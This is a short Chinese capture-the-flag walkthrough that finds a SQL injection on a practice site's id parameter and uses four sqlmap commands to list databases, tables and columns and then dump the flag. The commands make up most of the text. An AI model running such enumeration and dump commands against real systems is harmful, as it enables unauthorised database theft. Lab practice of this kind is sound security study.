输入1,页面显示hello,输入1',页面报错
1.报数据库 --dbs
sqlmap.py -u http://ctf5.shiyanbar.com/web/index_3.php?id=1 --dbs
2.猜表段 --tables (需指定数据库 -D 数据库名)
sqlmap.py -u http://ctf5.shiyanbar.com/web/index_3.php?id=1 --tables -D web1
3.猜字段 --columns (需制定表段 -T 制定数据库 -D)
sqlmap.py -u http://ctf5.shiyanbar.com/web/index_3.php?id=1 --columns -T flag -D web1
4.猜字段内容 --dump (需指定字段 -C 制定表段 -T 制定数据库 -D)
sqlmap.py -u http://ctf5.shiyanbar.com/web/index_3.php?id=1 --dump -C flag -T flag -D web1